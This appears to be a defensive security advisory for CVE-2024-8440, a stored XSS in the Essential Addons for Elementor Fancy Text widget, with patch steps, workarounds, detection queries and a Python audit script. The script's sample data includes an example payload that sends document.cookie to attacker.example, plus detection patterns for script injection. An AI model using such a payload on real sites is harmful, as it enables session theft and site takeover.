CVE-2024-8440
📋 TL;DR
This stored XSS vulnerability in the Essential Addons for Elementor plugin allows authenticated attackers with contributor-level access or higher to inject malicious scripts via the Fancy Text widget. The scripts execute in the browser of anyone who views an affected page, including logged-in administrators, so a single payload can compromise visitor and editor sessions alike. All WordPress sites running this plugin up to and including version 6.0.3 are affected.
💻 Affected Systems
- Essential Addons for Elementor Lite
- Essential Addons for Elementor Pro
📦 What is this software?
Essential Addons for Elementor is a WordPress plugin that adds extra widgets and extensions, including the Fancy Text widget, to the Elementor page builder. Widget settings entered in the editor are stored with the page and rendered into the page's HTML on every view, which is why unescaped input in a widget becomes a stored XSS.
⚠️ Risk & Real-World Impact
Worst Case
An administrator who views a page carrying the payload can have their session hijacked or their browser driven to perform privileged actions (creating admin users, installing a backdoored plugin), leading to complete site compromise; ordinary visitors can be redirected to malicious sites or served a defaced page.
Likely Case
Session or cookie theft from users who view the affected page, or defacement of public-facing pages through the injected script.
If Mitigated
With tight user-role management and review of contributor-submitted content before publication, impact is limited to isolated page defacement.
🎯 Exploit Status
Exploitation requires an authenticated account with contributor-level access or higher. Once authenticated, placing the payload in the widget's settings is straightforward, and the attacker then only needs a victim (ideally an administrator) to view the page; no further interaction is required.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 6.0.4
Vendor Advisory: https://wordpress.org/plugins/essential-addons-for-elementor-lite/#developers
Restart Required: No
Instructions:
1. Log into the WordPress admin panel.
2. Navigate to Plugins > Installed Plugins.
3. Find Essential Addons for Elementor.
4. Click 'Update Now' if available, or manually update to version 6.0.4 or later.
5. Clear any caching plugin and CDN caches so previously rendered pages are regenerated.
🔧 Temporary Workarounds
Disable Fancy Text Widget
Temporarily disable the vulnerable widget until patched.
Add to the active theme's functions.php (or a small mu-plugin). The priority of 100 ensures the callback runs after Essential Addons has registered its widgets on the same hook:
add_action('elementor/widgets/register', function ($widgets_manager) {
    // Unregister the Fancy Text widget so it no longer renders in the editor or on the front end.
    $widgets_manager->unregister_widget_type('eael-fancy-text');
}, 100);
Caveat: this stops the widget from rendering but does not remove a payload that is already saved in a page's Elementor data; audit existing content as well.
Restrict User Roles
Limit contributor-level (and higher) accounts to trusted users only; remove or demote stale accounts and check that open registration does not assign the contributor role by default.
🧯 If You Can't Patch
- Review and audit all content created by contributor-level users for suspicious markup, checking the stored Elementor data (the _elementor_data post meta) rather than only the rendered page, since caching can hide what is saved
- Implement Content Security Policy (CSP) headers to restrict script execution sources. WordPress and Elementor emit inline scripts, so a CSP that blocks inline script needs nonces or hashes; roll it out in report-only mode first to avoid breaking the site
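The content audit above, and the "Verify Fix Applied" check later on this page, both come down to inspecting what is stored in each page's _elementor_data and flagging Fancy Text widgets whose text settings contain HTML or JavaScript. The following is an added example written for this advisory, not code from the plugin or from the referenced advisories. It walks Elementor's JSON element tree, scopes the check to the eael-fancy-text widget by default (and can be widened to every widget), and applies a heuristic regex for script tags, javascript: URLs and inline event handlers. The eael_fancy_text_* setting names in the constructed sample are assumptions made for illustration, as is the attacker.example host:

```python
"""Audit exported Elementor page data for Fancy Text widgets carrying script-like content.

Added example for this advisory; not code from Essential Addons, Elementor or Wordfence.
"""
import json
import re

# Widget name registered by Essential Addons for the Fancy Text widget (from the advisory).
TARGET_WIDGET = "eael-fancy-text"

# Heuristic markers of HTML/JS that have no business in a plain text setting.
SUSPICIOUS = re.compile(
    r"<\s*script\b|javascript\s*:|\bon[a-z]+\s*=|<\s*(?:iframe|object|embed|svg)\b",
    re.IGNORECASE,
)


def iter_widgets(elements):
    """Depth-first walk of Elementor's element tree (containers/sections/columns -> widgets)."""
    for element in elements:
        if element.get("elType") == "widget":
            yield element
        yield from iter_widgets(element.get("elements", []))


def iter_strings(value, path=""):
    """Yield (setting path, string) for every string nested inside a settings value."""
    if isinstance(value, str):
        yield path, value
    elif isinstance(value, dict):
        for key, inner in value.items():
            yield from iter_strings(inner, f"{path}.{key}" if path else key)
    elif isinstance(value, list):
        for index, inner in enumerate(value):
            yield from iter_strings(inner, f"{path}[{index}]")


def audit_elementor_data(post_id, elementor_data_json, widget_types=frozenset({TARGET_WIDGET})):
    """Return findings for one post's _elementor_data value.

    widget_types limits the check to the given widget names; pass None to audit every widget.
    """
    findings = []
    try:
        elements = json.loads(elementor_data_json)
    except json.JSONDecodeError:
        return [{"post_id": post_id, "widget_id": None, "setting": None, "match": "invalid JSON"}]
    for widget in iter_widgets(elements):
        if widget_types is not None and widget.get("widgetType") not in widget_types:
            continue
        for path, text in iter_strings(widget.get("settings", {})):
            match = SUSPICIOUS.search(text)
            if match:
                findings.append({
                    "post_id": post_id,
                    "widget_id": widget.get("id"),
                    "setting": path,
                    "match": match.group(0),
                })
    return findings


# Constructed sample (not real site data): a section > column holding a heading widget
# with an injected handler, a benign Fancy Text widget, and a Fancy Text widget whose
# repeater string carries a cookie-stealing payload. The eael_fancy_text_* keys are assumed.
SAMPLE_ELEMENTOR_DATA = json.dumps([
    {"id": "a1", "elType": "section", "elements": [
        {"id": "b2", "elType": "column", "elements": [
            {"id": "c3", "elType": "widget", "widgetType": "heading",
             "settings": {"title": "<b>Welcome</b> <img src=x onerror=alert(1)>"}},
            {"id": "d4", "elType": "widget", "widgetType": "eael-fancy-text",
             "settings": {"eael_fancy_text_prefix_stirng": "We build",
                          "eael_fancy_text_strings": [
                              {"eael_fancy_text_strings_text_field": "websites"},
                              {"eael_fancy_text_strings_text_field": "apps"}]}},
            {"id": "e5", "elType": "widget", "widgetType": "eael-fancy-text",
             "settings": {"eael_fancy_text_strings": [
                 {"eael_fancy_text_strings_text_field":
                  'fast <img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">'}]}},
        ]},
    ]},
])

if __name__ == "__main__":
    # Audit the constructed sample; feed real rows (post_id, _elementor_data) the same way.
    for finding in audit_elementor_data(42, SAMPLE_ELEMENTOR_DATA):
        print(finding)
```

On a real site, pull the data per page with `wp post meta get <post_id> _elementor_data` and pass it to audit_elementor_data. The regex is deliberately a heuristic for triage: a clean result does not prove a page is safe, and any Fancy Text string that contains markup at all deserves a look, because the widget has no legitimate need for HTML in those settings.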
🔍 How to Verify
Check if Vulnerable:
Check the plugin version in WordPress admin > Plugins > Essential Addons for Elementor. If the version is 6.0.3 or lower, you are vulnerable.
Check Version:
wp plugin get essential-addons-for-elementor-lite --field=version
Verify Fix Applied:
Confirm the plugin version is 6.0.4 or higher. On a staging copy, add a Fancy Text widget as a contributor-level user with a test payload (an HTML tag carrying an event handler is enough) and confirm the rendered page shows it as escaped text rather than executing it.
📡 Detection & Monitoring
Log Indicators:
- POST requests to /wp-admin/admin-ajax.php with action=elementor_ajax (the Elementor editor's save path) from contributor accounts at unusual times or in unusual volume
- Multiple page edits by contributor users in short time
Network Indicators:
- External script loads from unexpected domains, or inline event handlers (onerror=, onload=) in rendered Fancy Text markup, in page responses
SIEM Query:
source="wordpress.log" AND "eael-fancy-text" AND ("script" OR "onerror" OR "javascript:")
Caveat: this only works where the log source captures request bodies or saved Elementor data (a WAF or application-level log). Standard web server access logs do not contain POST bodies, so the authoritative check is the _elementor_data stored in wp_postmeta.
🔗 References
- https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/trunk/includes/Elements/Fancy_Text.php#L114
- https://plugins.trac.wordpress.org/changeset/3148624/
- https://wordpress.org/plugins/essential-addons-for-elementor-lite/#developers
- https://www.wordfence.com/threat-intel/vulnerabilities/id/c5960396-5320-4978-aa82-2e33700daa43?source=cve